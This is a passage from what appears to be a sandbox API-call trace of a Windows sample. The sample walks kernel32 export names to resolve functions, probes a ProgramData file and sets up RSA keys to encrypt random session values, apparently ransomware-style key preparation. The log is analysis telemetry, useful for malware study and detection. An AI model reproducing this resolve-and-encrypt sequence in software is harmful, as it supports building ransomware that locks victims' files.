(lpString="CMDBATNOTIFICATION") returned 18 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0048.222] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0048.222] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0048.222] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0048.222] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0048.222] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0048.223] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0048.223] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0048.223] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0048.223] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0048.223] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0048.223] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0048.223] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0048.223] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0048.223] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0048.223] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0048.223] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0048.223] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0048.223] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0048.223] lstrlenA (lpString="COPYCONTEXT") returned 11 [0048.223] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0048.224] lstrlenA (lpString="COPYFILEA") returned 9 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0048.224] lstrlenA (lpString="COPYFILEEXA") returned 11 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0048.224] lstrlenA (lpString="COPYFILEEXW") returned 11 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0048.224] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0048.224] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0048.224] lstrlenA (lpString="COPYFILEW") returned 9 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0048.224] lstrlenA (lpString="COPYLZFILE") returned 10 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0048.224] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0048.224] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0048.224] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0048.224] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0048.224] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0048.224] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0048.224] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0048.225] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0048.225] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0048.225] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0048.225] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0048.225] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0048.225] lstrlenA (lpString="CREATEEVENTA") returned 12 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0048.225] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0048.225] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0048.225] lstrlenA (lpString="CREATEEVENTW") returned 12 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0048.225] lstrlenA (lpString="CREATEFIBER") returned 11 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0048.225] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0048.225] lstrlenA (lpString="CREATEFILEA") returned 11 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0048.225] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0048.225] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0048.226] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0048.226] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0048.226] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0048.226] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0048.226] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0048.226] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0048.226] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0048.226] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0048.226] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0048.226] lstrcpyA (in: lpString1=0xc9d438, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0048.226] lstrlenA (lpString="CREATEFILEW") returned 11 [0048.226] CreateFileW (lpFileName="C:\\ProgramData\\0x29A.db" (normalized: "c:\\programdata\\0x29a.db"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.226] CryptAcquireContextW (in: phProv=0xc9e0e4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xc9e0e4*=0x60e518) returned 1 [0048.229] CryptGenKey (in: hProv=0x60e518, Algid=0xa400, dwFlags=0x8000001, phKey=0xc9e0d8 | out: phKey=0xc9e0d8*=0x5f8758) returned 1 [0051.640] CryptExportKey (in: hKey=0x5f8758, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0xc9e0e0 | out: pbData=0x0*, pdwDataLen=0xc9e0e0*=0x114) returned 1 [0051.641] VirtualAlloc (lpAddress=0x0, dwSize=0x115, flAllocationType=0x3000, flProtect=0x4) returned 0xdb0000 [0051.641] CryptExportKey (in: hKey=0x5f8758, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0xdb0000, pdwDataLen=0xc9e0e0 | out: pbData=0xdb0000*, pdwDataLen=0xc9e0e0*=0x114) returned 1 [0051.641] CryptExportKey (in: hKey=0x5f8758, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x0, pdwDataLen=0xc9e0dc | out: pbData=0x0*, pdwDataLen=0xc9e0dc*=0x494) returned 1 [0051.641] VirtualAlloc (lpAddress=0x0, dwSize=0x494, flAllocationType=0x3000, flProtect=0x4) returned 0xf00000 [0051.642] CryptExportKey (in: hKey=0x5f8758, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0xf00000, pdwDataLen=0xc9e0dc | out: pbData=0xf00000*, pdwDataLen=0xc9e0dc*=0x494) returned 1 [0051.642] CryptDestroyKey (hKey=0x5f8758) returned 1 [0051.642] CryptReleaseContext (hProv=0x60e518, dwFlags=0x0) returned 1 [0051.645] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0051.648] CryptAcquireContextW (in: phProv=0xf10004, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xf10004*=0x61e810) returned 1 [0051.649] CryptImportKey (in: hProv=0x61e810, pbData=0x1104b8, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0xf10008 | out: phKey=0xf10008*=0x5f8758) returned 1 [0051.649] CryptGenRandom (in: hProv=0x61e810, dwLen=0x20, pbBuffer=0xc9e078 | out: pbBuffer=0xc9e078) returned 1 [0051.649] CryptGenRandom (in: hProv=0x61e810, dwLen=0x8, pbBuffer=0xc9e098 | out: pbBuffer=0xc9e098) returned 1 [0051.652] CryptEncrypt (in: hKey=0x5f8758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc9e5a0*, pdwDataLen=0xc9e0e0*=0x20, dwBufLen=0x100 | out: pbData=0xc9e5a0*, pdwDataLen=0xc9e0e0*=0x100) returned 1 [0051.653] CryptEncrypt (in: hKey=0x5f8758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc9e6a0*, pdwDataLen=0xc9e0e0*=0x8, dwBufLen=0x100 | out: pbData=0xc9e6a0*, pdwDataLen=0xc9e0e0*=0x100) returned 1 [0051.653] CryptDestroyKey (hKey=0x5f8758) returned 1 [0051.653] CryptReleaseContext (hProv=0x61e810, dwFlags=0x0) returned 1 [0051.653] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.656] lstrlenA (lpString="kernel32.dll") returned 12 [0051.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0051.656] lstrcpyA (in: lpString1=0xc9d320, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0051.656] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0051.656] lstrcpyA (in: lpString1=0xc9d320, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0051.656] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0051.656] lstrcpyA (in: lpString1=0xc9d320, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0051.656] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0051.656] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0051.657] lstrlenA (lpString="ADDATOMA") returned 8 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0051.657] lstrlenA (lpString="ADDATOMW") returned 8 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0051.657] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0051.657] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0051.657] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0051.657] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0051.657] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0051.657] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0051.657] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0051.657] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0051.657] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0051.657] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0051.657] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0051.657] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0051.657] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0051.657] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0051.657] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0051.657] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0051.657] lstrcpyA (in: lpString1=0xc9d320, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0051.657] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0051.658] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0051.658] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0051.658] lstrlenA (lpString="BACKUPREAD") returned 10 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0051.658] lstrlenA (lpString="BACKUPSEEK") returned 10 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0051.658] lstrlenA (lpString="BACKUPWRITE") returned 11 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0051.658] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0051.658] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0051.658] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0051.658] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0051.658] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0051.658] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0051.658] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0051.658] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0051.658] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0051.658] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0051.658] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0051.658] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0051.658] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0051.658] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0051.658] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0051.659] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0051.659] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0051.659] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0051.659] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0051.659] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0051.659] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0051.659] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0051.659] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0051.659] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0051.659] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0051.659] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0051.659] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0051.659] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0051.659] lstrlenA (lpString="BEEP") returned 4 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0051.659] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0051.659] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0051.659] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BuildCommDCBA" | out: 